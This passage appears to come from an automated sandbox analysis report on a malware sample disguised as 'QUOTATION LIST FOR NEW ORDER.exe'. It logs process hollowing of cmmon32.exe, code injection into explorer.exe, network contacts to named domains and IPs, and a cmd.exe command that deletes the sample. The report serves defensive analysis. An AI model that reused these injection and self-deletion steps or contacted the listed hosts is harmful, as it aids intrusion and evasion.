          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04818EC7 mov eax, dword ptr fs:[00000030h]12_2_04818EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488FEC0 mov eax, dword ptr fs:[00000030h]12_2_0488FEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802ACB mov eax, dword ptr fs:[00000030h]12_2_04802ACB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048036CC mov eax, dword ptr fs:[00000030h]12_2_048036CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8ED6 mov eax, dword ptr fs:[00000030h]12_2_048A8ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DE620 mov eax, dword ptr fs:[00000030h]12_2_047DE620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048016E0 mov ecx, dword ptr fs:[00000030h]12_2_048016E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F3A1C mov eax, dword ptr fs:[00000030h]12_2_047F3A1C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802AE4 mov eax, dword ptr fs:[00000030h]12_2_04802AE4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAA16 mov eax, dword ptr fs:[00000030h]12_2_047DAA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAA16 mov eax, dword ptr fs:[00000030h]12_2_047DAA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]12_2_047D5210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov ecx, dword ptr fs:[00000030h]12_2_047D5210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]12_2_047D5210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]12_2_047D5210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E8A0A mov eax, dword ptr fs:[00000030h]12_2_047E8A0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]12_2_047DC600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]12_2_047DC600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]12_2_047DC600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04808E00 mov eax, dword ptr fs:[00000030h]12_2_04808E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891608 mov eax, dword ptr fs:[00000030h]12_2_04891608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E76E2 mov eax, dword ptr fs:[00000030h]12_2_047E76E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A61C mov eax, dword ptr fs:[00000030h]12_2_0480A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A61C mov eax, dword ptr fs:[00000030h]12_2_0480A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04814A2C mov eax, dword ptr fs:[00000030h]12_2_04814A2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04814A2C mov eax, dword ptr fs:[00000030h]12_2_04814A2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488FE3F mov eax, dword ptr fs:[00000030h]12_2_0488FE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EAAB0 mov eax, dword ptr fs:[00000030h]12_2_047EAAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EAAB0 mov eax, dword ptr fs:[00000030h]12_2_047EAAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04864257 mov eax, dword ptr fs:[00000030h]12_2_04864257
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]12_2_047D52A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]12_2_047D52A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]12_2_047D52A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]12_2_047D52A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]12_2_047D52A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488B260 mov eax, dword ptr fs:[00000030h]12_2_0488B260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488B260 mov eax, dword ptr fs:[00000030h]12_2_0488B260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8A62 mov eax, dword ptr fs:[00000030h]12_2_048A8A62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481927A mov eax, dword ptr fs:[00000030h]12_2_0481927A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0489138A mov eax, dword ptr fs:[00000030h]12_2_0489138A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488D380 mov ecx, dword ptr fs:[00000030h]12_2_0488D380
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480B390 mov eax, dword ptr fs:[00000030h]12_2_0480B390
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]12_2_04857794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]12_2_04857794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]12_2_04857794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802397 mov eax, dword ptr fs:[00000030h]12_2_04802397
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DDB60 mov ecx, dword ptr fs:[00000030h]12_2_047DDB60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EFF60 mov eax, dword ptr fs:[00000030h]12_2_047EFF60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DF358 mov eax, dword ptr fs:[00000030h]12_2_047DF358
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]12_2_04804BAD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]12_2_04804BAD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]12_2_04804BAD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A5BA5 mov eax, dword ptr fs:[00000030h]12_2_048A5BA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DDB40 mov eax, dword ptr fs:[00000030h]12_2_047DDB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EEF40 mov eax, dword ptr fs:[00000030h]12_2_047EEF40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048553CA mov eax, dword ptr fs:[00000030h]12_2_048553CA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048553CA mov eax, dword ptr fs:[00000030h]12_2_048553CA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D4F2E mov eax, dword ptr fs:[00000030h]12_2_047D4F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D4F2E mov eax, dword ptr fs:[00000030h]12_2_047D4F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]12_2_048003E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]12_2_048003E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]12_2_048003E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]12_2_048003E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]12_2_048003E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]12_2_048003E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FF716 mov eax, dword ptr fs:[00000030h]12_2_047FF716
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048137F5 mov eax, dword ptr fs:[00000030h]12_2_048137F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A070D mov eax, dword ptr fs:[00000030h]12_2_048A070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A070D mov eax, dword ptr fs:[00000030h]12_2_048A070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A70E mov eax, dword ptr fs:[00000030h]12_2_0480A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A70E mov eax, dword ptr fs:[00000030h]12_2_0480A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0489131B mov eax, dword ptr fs:[00000030h]12_2_0489131B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FF10 mov eax, dword ptr fs:[00000030h]12_2_0486FF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FF10 mov eax, dword ptr fs:[00000030h]12_2_0486FF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FDBE9 mov eax, dword ptr fs:[00000030h]12_2_047FDBE9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480E730 mov eax, dword ptr fs:[00000030h]12_2_0480E730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8B58 mov eax, dword ptr fs:[00000030h]12_2_048A8B58
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8F6A mov eax, dword ptr fs:[00000030h]12_2_048A8F6A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E8794 mov eax, dword ptr fs:[00000030h]12_2_047E8794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E1B8F mov eax, dword ptr fs:[00000030h]12_2_047E1B8F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E1B8F mov eax, dword ptr fs:[00000030h]12_2_047E1B8F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04803B7A mov eax, dword ptr fs:[00000030h]12_2_04803B7A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04803B7A mov eax, dword ptr fs:[00000030h]12_2_04803B7A
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.quotovate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 204.11.58.233 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tomio.tech
          Source: C:\Windows\explorer.exeDomain query: www.everesttechsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 47.222.2.124 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3292Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 3D0000Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'Jump to behavior
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.334676030.0000000005F40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.349692580.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
